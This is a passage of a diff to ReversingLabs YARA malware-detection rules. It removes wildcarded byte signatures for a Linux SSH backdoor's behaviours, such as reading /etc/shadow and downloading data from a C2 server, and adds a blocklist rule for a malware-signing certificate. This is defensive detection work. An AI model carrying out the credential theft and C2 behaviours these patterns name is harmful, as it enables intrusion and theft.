-            48 89 44 24 ?? 0F 11 44 24 ?? 8B F7 E8 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8B F8 48 85 C0
-            0F 84 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 4C 8B CB 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D
-            45 ?? 49 8B DC 0F 1F 80 ?? ?? ?? ?? 48 FF C3 66 39 34 58 75 ?? 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D
-            55 ?? 49 8B CF 41 B9 ?? ?? ?? ?? 44 8B C3 FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ??
-            45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49
-            8B CD FF D0 4C 8B E0 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48
-        }
-		$download_data_from_c2_p2 = {
-            8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 45 33 C9 89 7C 24
-            ?? 45 33 C0 33 D2 89 7C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C
-            24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 49 8B CF
-            FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
-            ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
-            ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ??
-            ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 45 33 C0 48 89 4C 24 ?? 4C 8D 4C 24 ??
-            48 8D 4C 24 ?? BA ?? ?? ?? ?? 48 89 4C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ??
-            8B 5C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48
-            8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
-            ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
-            ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ??
-            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ??
-            ?? ?? 44 8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
-        }
-		$download_data_from_c2_p3 = {
-            8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
-            8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85
-            C0 0F 84 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B C6 48 8B D6 49 8B CF FF D0 85 C0 74 ?? 44
-            8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
-            85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ??
-            4C 8D 4C 24 ?? 48 89 7C 24 ?? 45 8B C6 48 8B D6 49 8B CC FF D0 85 C0 74 ?? 39 7C 24
-            ?? 0F 87 ?? ?? ?? ?? BF ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D 4C 24 ?? 44 8B F7 E8 ?? ??
-            ?? ?? 4D 85 E4 74 ?? 49 83 FC ?? 74 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
-            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
-            E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CF E8 ??
-            ?? ?? ?? 41 8B FE 48 85 C0 74 ?? 49 8B CC FF D0 4D 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4D
-            8B C7 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ??
-            ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 F6
-            74 ?? FF 15 ?? ?? ?? ?? 4C 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 8B C7 48 8B 8D ??
-            ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $decrypt_configuration_p* ) ) and ( $decryption_algorithm ) and ( all of ( $request_access_token_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $download_data_from_c2_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" and 1646352000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Sshdinjector : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sshdinjector backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "781d7a64-0908-5aa8-a178-cffe52e78036"
-		date = "2025-03-27"
-		modified = "2025-03-27"
+		id = "b025fe73-89fa-55f2-8b3a-cb46251669e6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.Sshdinjector.yara#L1-L197"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9370b59a3317ac14b5791723411216315e480fad7419d248aaed42a19312da0c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10498-L10514"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "00ceb241555154cab97ef616042dbd966f3a8fae257e142dfe6bad9559bd1724"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Sshdinjector"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$kill_and_restart_daemons_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D 55
-            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83 C2 ?? 48 8D
-            95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83
-            C2 ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-            89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48
-            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ??
-            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74
-        }
-		$kill_and_restart_daemons_p2 = {
-            48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48
-            8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-            89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 94 C0 84 C0 0F 84 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 81 7D
-            ?? ?? ?? ?? ?? 0F 9E C0 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 48 8D 45
-            ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$network_communication_p1 = {
-            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ??
-            ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 78 ?? E8 ?? ?? ?? ?? 48 8D 50 ?? 48 8B 05 ??
-            ?? ?? ?? 48 8D 04 02 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48
-            8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48
-            03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 C2 48 8B 05 ?? ?? ?? ??
-            66 89 10 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D
-            71 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 0F B7 00 0F B7 C8 0F B7 55 ?? 0F
-            B7 45 ?? 41 89 C8 89 D1 89 C2 48 8B 05 ?? ?? ?? ?? 48 8D 70 ?? 48 8D 3D ?? ?? ?? ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05
-            ?? ?? ?? ?? 0F B7 00 66 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 65 ?? 0F B7 5D ?? 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 CE 48
-        }
-		$network_communication_p2 = {
-            89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ?? ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE
-            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3
-            49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 89 D3 49 89 C4
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44
-            0F B7 65 ?? 0F B7 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ??
-            ?? ?? ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
-            E0 48 63 D3 EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63
-            D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
-        }
-		$read_etc_shadow_p1 = {
-            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89
-            95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
-            8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ??
-            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
-            D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8D 3D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 55
-            ?? 41 B9 ?? ?? ?? ?? 41 89 D0 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8D
-            3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B
-            45 ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00
-        }
-		$read_etc_shadow_p2 = {
-            3C ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00 3C ?? 0F 84 ?? ?? ?? ?? 48
-            8B 45 ?? 89 C2 48 8B 45 ?? 89 D1 29 C1 89 C8 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? 8B 45 ?? 48 63 D0 48 8D 4D ?? 48 8B 5D ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ??
-            ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89
-            C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48
-            63 D3 E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ??
-            ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ??
-            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 74 ?? 48 8B 45 ?? 48 83 C0 ?? 48
-            89 45 ?? 48 8B 85 ?? ?? ?? ?? 48 03 45 ?? 48 3B 45 ?? 0F 97 C0 84 C0 0F 85 ?? ?? ??
-            ?? EB ?? 90 EB ?? 90 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48
-            8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
-            9D ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB
-            ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ??
-            89 D3 49 89 C4 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ??
-            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ??
-            ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3
-            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89
-            E0 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
-        }
-		$list_running_services_p1 = {
-            55 48 89 E5 41 57 41 56 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89
-            B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 8D 55 ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49
-            89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 E9 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48
-            89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ??
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 94 C0 84 C0 74 ??
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 85 ?? ?? ??
-            ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
-        }
-		$list_running_services_p2 = {
-            8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 0F 85 ?? ?? ?? ??
-            BB ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 41 BE ?? ?? ?? ?? 48 8B 45 ?? 48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89
-            C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 48 8B 45 ??
-            48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 41 BD ?? ?? ??
-            ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? B8 ?? ?? ??
-            ?? EB ?? B8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 45 84 ED 75 ?? EB ?? 41 89 D7 48 89 85 ??
-            ?? ?? ?? 45 84 ED 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 49
-            63 D7 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 41 89 D5 49 89 C7 45 84 E4 74
-            ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 F8 49 63 D5 41 89 D4 49 89 C5 84 DB 74
-            ?? EB ?? 45 84 E4 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 4C 89 E8 49 63 D4 EB ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? EB ?? 89 D3 49 89 C4 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
-            E0 48 63 D3 EB ?? 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 80 BD ?? ?? ??
-            ?? ?? 74 ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
-        }
-		$list_running_services_p3 = {
